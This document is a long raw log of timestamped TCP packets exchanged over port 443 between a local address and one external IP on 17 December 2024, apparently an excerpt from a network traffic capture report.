                                Dec 17, 2024 08:24:41.820175886 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:41.820207119 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:41.820257902 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:41.820266962 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:41.820282936 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:41.820457935 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:41.820457935 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:41.830204964 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:41.830225945 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:41.830301046 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:41.830312967 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:41.834506035 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:41.834579945 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:41.834585905 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:41.834657907 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:41.841063976 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:41.843432903 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:41.843455076 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:41.843518972 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:41.843525887 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:41.843619108 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:41.844827890 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:41.847754002 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:41.847820044 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:41.847830057 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:41.850750923 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:41.850809097 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:41.850815058 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:41.853436947 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:41.854562044 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:41.854624987 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:41.863059044 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:41.863153934 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:41.863159895 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:41.863174915 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:41.863223076 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:41.868947029 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:41.869019985 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:41.869025946 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:41.869080067 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:41.921709061 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:41.958028078 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:41.965250969 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:41.965293884 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:41.965322018 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:41.965332985 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:41.965368032 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:41.969650030 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:41.969716072 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:41.969721079 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:41.971025944 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:41.971080065 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:41.971084118 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:41.971127987 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:41.991327047 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.003228903 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.003294945 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.003329992 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.003338099 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.003369093 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.004062891 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.007965088 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.008021116 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.008025885 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.008105040 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.008996010 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.009048939 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.012826920 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.012922049 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.012926102 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.012967110 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.013896942 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.013953924 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.017334938 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.017402887 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.020920992 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.020983934 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.023457050 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.023514986 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.023830891 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.026820898 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.026875973 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.028023958 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.028078079 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.030445099 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.030500889 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.031570911 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.031622887 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.040699959 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.040726900 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.040755033 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.040771008 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.040777922 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.040802002 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.048685074 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.048788071 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.048814058 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.048866987 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.048871040 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.048898935 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.049884081 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.049962044 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.049966097 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.105011940 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.117578983 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.158930063 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.158957958 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.159046888 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.159061909 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.159115076 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.183695078 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.193309069 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.193347931 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.193380117 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.193387985 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.193413019 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.201149940 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.201168060 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.201220989 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.201227903 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.201252937 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.226051092 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.226068974 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.226157904 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.226167917 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.226854086 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.226870060 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.226917028 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.226922989 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.226948977 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.227492094 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.227509022 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.227566004 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.227572918 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.229314089 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.233577013 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.233597040 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.233666897 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.233673096 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.239480972 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.239502907 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.239562035 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.239568949 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.239581108 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.241034031 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.349914074 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.349939108 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.350033998 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.350044012 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.350092888 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.385720968 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.385746956 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.385852098 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.385865927 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.385910988 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.390943050 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.392911911 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.392978907 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.393013954 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.393023014 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.393053055 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.393064022 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.400827885 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.400872946 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.400913954 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.400933981 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.400954008 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.400979042 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.401837111 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.408879042 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.408938885 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.408986092 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.408996105 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.409043074 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.416861057 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.416906118 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.416941881 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.416949987 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.416960001 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.424346924 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.424401045 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.424449921 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.424459934 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.424495935 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.431057930 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.431138992 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.431139946 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.431157112 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.431209087 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.439143896 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.476846933 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.541774988 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.541832924 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.541851044 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.541878939 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.541897058 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.541980982 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.565593004 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.576533079 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.577788115 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.577841997 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.577861071 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.577883005 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.577899933 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.577919960 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.584696054 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.584743977 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.584785938 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.584805012 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.584821939 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.584840059 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.586229086 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.592576027 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.592623949 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.592648983 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.592674971 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.592700958 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.592736959 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.598517895 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.599666119 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.599714041 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.599737883 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.599757910 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.599777937 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.599796057 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.607605934 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.607652903 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.607686043 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.607714891 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.607737064 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.607760906 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.615205050 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.615252018 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.615293026 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.615324020 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.615349054 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.615360022 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.623001099 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.623047113 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.623078108 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.623106956 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.623126030 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.623171091 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.635241032 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.692639112 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.734237909 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.734307051 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.734375954 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.734405041 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.734427929 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.734456062 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.769849062 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.769917965 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.770068884 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.770068884 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.770102978 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.770149946 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.776868105 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.776912928 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.776962042 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.776977062 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.776992083 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.777014971 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.784868956 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.784930944 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.784976006 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.784985065 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.785005093 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.785022974 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.785852909 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.785902023 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.789360046 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.789438963 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.789447069 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.790616035 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.790672064 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.790680885 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.790724993 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.795294046 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.795367002 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.795372009 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.795397997 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.795448065 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.798116922 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.803169966 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.803212881 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.803246021 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.803266048 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.803277016 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.803308010 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.810704947 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.810751915 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.810797930 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.810816050 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.810842037 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.810851097 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.818737030 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.818779945 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.818806887 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.818814993 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.818845034 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.818859100 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.819807053 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.819858074 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.930368900 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.930440903 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.930527925 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.930550098 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.930579901 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.930592060 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.961299896 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.962346077 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.962492943 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.962519884 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.962547064 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.962589979 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.970369101 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.970421076 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.970484018 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.970511913 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.970536947 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.970554113 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.977694988 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.978411913 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.978458881 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.978504896 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.978529930 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.978558064 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.978571892 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.985274076 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.985323906 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.985372066 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.985400915 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.985419989 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.985444069 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.993288040 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.993340015 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.993383884 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.993412018 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:42.993427992 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:42.993449926 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.000725031 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.000772953 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.000823021 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.000847101 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.000868082 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.000890970 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.008697987 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.008748055 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.008795977 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.008816004 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.008832932 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.009263992 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.119090080 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.119144917 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.119235039 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.119261026 CET44349700104.21.87.65192.168.2.7
